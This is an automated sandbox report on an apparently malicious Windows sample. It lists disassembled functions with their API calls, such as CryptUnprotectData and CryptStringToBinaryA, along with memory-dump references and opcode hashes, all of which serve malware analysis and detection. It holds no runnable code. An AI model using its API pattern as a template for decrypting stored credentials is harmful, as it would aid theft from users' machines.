                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: e5c54037bf95db458f172806dd3e3f6534bea714f72fc23ad7af0c64b8663147
                                • Instruction ID: ee7b3be6a8ba93fecc64e24483211ca130bba31acf13857a8458ca0cbc914f79
                                • Opcode Fuzzy Hash: e5c54037bf95db458f172806dd3e3f6534bea714f72fc23ad7af0c64b8663147
                                • Instruction Fuzzy Hash: 960140B2904528EBCB149BDADD45FBEB7BCFB4CB11F00011AF645A2280E7785440C7B1
                                Function 006C9B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006C9B3B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 006C9B4A
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006C9B61
                                • LocalFree.KERNEL32 ref: 006C9B70
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: 7ecf12b0d36600da7d5b3c7f141c1e51560550ea2c4541e4593688fc385e6297
                                • Instruction ID: 08218f9464764e3135001480db28c95f7a2a4678496f3d19a27c242b29187cc8
                                • Opcode Fuzzy Hash: 7ecf12b0d36600da7d5b3c7f141c1e51560550ea2c4541e4593688fc385e6297
                                • Instruction Fuzzy Hash: 84F01D703407127BE7305F74AC49FA77BA8EF44B50F210114FA49EA2D0EBB49C40CAA4
                                Function 00A73552 Relevance: 5.3, Strings: 3, Instructions: 1563COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 6|~o$~0;$&}o
                                • API String ID: 0-295759132
                                • Opcode ID: 207ee3f077f33cd4b8205b9f92b486eb3e0ac4891bfb290f85732c6c266b506f
                                • Instruction ID: ad8b9ae899918b745fe6e7cc0e5eccece3b9f5f0e0977f2473a69977ff01b49c
                                • Opcode Fuzzy Hash: 207ee3f077f33cd4b8205b9f92b486eb3e0ac4891bfb290f85732c6c266b506f
                                • Instruction Fuzzy Hash: 41A216F36086049FE304AE2DEC8567ABBEAEFD4720F1A853DE6C487744E63558058793
                                Function 006DCAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.COMBASE(006EB110,00000000,00000001,006EB100,?), ref: 006DCB06
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 006DCB46
                                • lstrcpyn.KERNEL32(?,?,00000104), ref: 006DCBC9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 1940255200-0
                                • Opcode ID: fe41bdbb847e6701e05975efde7ae662da90743a20b565e6c2b830051b528c6e
                                • Instruction ID: e4be8d5332b7bec722c2e1071f6e13211cce256b59060c601b5c4ff8fb1f8e6f
                                • Opcode Fuzzy Hash: fe41bdbb847e6701e05975efde7ae662da90743a20b565e6c2b830051b528c6e
                                • Instruction Fuzzy Hash: 1C314671A40619BFD710DB94CC92FAA77B9EB88B10F104195FA14EB2D0D7B0ED45CB90
                                Function 006C9B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 006C9B9F
                                • LocalAlloc.KERNEL32(00000040,?), ref: 006C9BB3
                                • LocalFree.KERNEL32(?), ref: 006C9BD7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: da9ff68d92048531ab5c6850659c0bdf8ab7aa8f6061ae5c62d217d25c105888
                                • Instruction ID: 18e26896a55cbfb5556ab5d3f8064477fe73d6c1e1fdea2156297ac2ad38e0fe
                                • Opcode Fuzzy Hash: da9ff68d92048531ab5c6850659c0bdf8ab7aa8f6061ae5c62d217d25c105888
                                • Instruction Fuzzy Hash: 2901FB75A41209ABE7109BA4DC49FBBB779EB84B00F104558EA04AB384DBB49E00CBE5
                                Function 00A707D4 Relevance: 2.2, Strings: 1, Instructions: 963COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: }~Y7
                                • API String ID: 0-901423381
                                • Opcode ID: 3b0367b08703e9a7ddb821a3c007f073d79aac24580350d108492daa16268e67
                                • Instruction ID: 45d3bef5d55ce75eea4ceb471add7a188dca6e0a092a48215ef5660556fba19e
                                • Opcode Fuzzy Hash: 3b0367b08703e9a7ddb821a3c007f073d79aac24580350d108492daa16268e67
                                • Instruction Fuzzy Hash: 715227F3A082109FE308AE2DEC95A7BBBE9EFD4360F1A453DE5C5C7744E93558018692
                                Function 009B9CF6 Relevance: 1.5, Strings: 1, Instructions: 229COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: :Bnn
                                • API String ID: 0-2629342209
                                • Opcode ID: 9e6c95dd639ed3679260cd6574306cfbf00a148e7fafa46e3d5dc740318e59b0
                                • Instruction ID: 9ec28091e223e42460296340f1115761c55e1934b8544c57e75df86a69cd3787
                                • Opcode Fuzzy Hash: 9e6c95dd639ed3679260cd6574306cfbf00a148e7fafa46e3d5dc740318e59b0
                                • Instruction Fuzzy Hash: 606158F3E082045BE348693DDC2577AB6D6EB95320F1F453DDA86D7B80EC3949458286
                                Function 00A5CF30 Relevance: .2, Instructions: 245COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 309761e0c50f79cd835c612c9eb3749fc2ffe09b8fb9eaae8b1b3559382ba41d
                                • Instruction ID: e3586b0b113d146e4593d9c369b831a7d7861285050e93a26c9450def4dcd039
                                • Opcode Fuzzy Hash: 309761e0c50f79cd835c612c9eb3749fc2ffe09b8fb9eaae8b1b3559382ba41d
                                • Instruction Fuzzy Hash: 578102B3A083008BE3046E3DED9573AB7D5EB94320F1A893DEBC5C7784E97D49458686
                                Function 0098CF83 Relevance: .2, Instructions: 192COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 42b06f1451ecb70007eebaa9ffc73fc560bd339791a27977fe6e1e8d30c07889
                                • Instruction ID: f91ac6e6ac3c720020540ab035affcfbd9c51d1700695e2bd80091672006ed47
                                • Opcode Fuzzy Hash: 42b06f1451ecb70007eebaa9ffc73fc560bd339791a27977fe6e1e8d30c07889
                                • Instruction Fuzzy Hash: 405138B3F082205BF354993DED487667ADAD7C4320F3B823DE948D7784E87A5D0646A1
                                Function 00B7E7BB Relevance: .2, Instructions: 159COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4c7610bbf22321163ad14881ea702903f00cc44be5f6fbd51d20bbf6b2d89e51
                                • Instruction ID: 2d82937fc89b66e6d5b5a5d20ed6b6b1e74d058930fb209819b2f53081286899
                                • Opcode Fuzzy Hash: 4c7610bbf22321163ad14881ea702903f00cc44be5f6fbd51d20bbf6b2d89e51
                                • Instruction Fuzzy Hash: 584105F361C200DFE3086E18D88157AB7D5EF98320F2589AEE1FBC6680D635D8419753
                                Function 00AE4D34 Relevance: .1, Instructions: 94COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 785781458f8d28df55a723180428c604c2c60ab9d3510bc68693a52667853a1c
                                • Instruction ID: 3b694373b5b13401a740e006feb39d268460e769896b010a7f0b0a38c76c6844
                                • Opcode Fuzzy Hash: 785781458f8d28df55a723180428c604c2c60ab9d3510bc68693a52667853a1c
                                • Instruction Fuzzy Hash: 4231D4B240C708EFD715BF29E8856BAFBE4EF18310F02491DD6D582650E7355440DB87
                                Function 006D85B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006D8636
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D866D
                                • lstrcpy.KERNEL32(?,00000000), ref: 006D86AA
                                • StrStrA.SHLWAPI(?,00F201D8), ref: 006D86CF
                                • lstrcpyn.KERNEL32(008F93D0,?,00000000), ref: 006D86EE
                                • lstrlen.KERNEL32(?), ref: 006D8701
                                • wsprintfA.USER32 ref: 006D8711
                                • lstrcpy.KERNEL32(?,?), ref: 006D8727
                                • StrStrA.SHLWAPI(?,00F20208), ref: 006D8754
                                • lstrcpy.KERNEL32(?,008F93D0), ref: 006D87B4
                                • StrStrA.SHLWAPI(?,00F204D8), ref: 006D87E1
                                • lstrcpyn.KERNEL32(008F93D0,?,00000000), ref: 006D8800
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
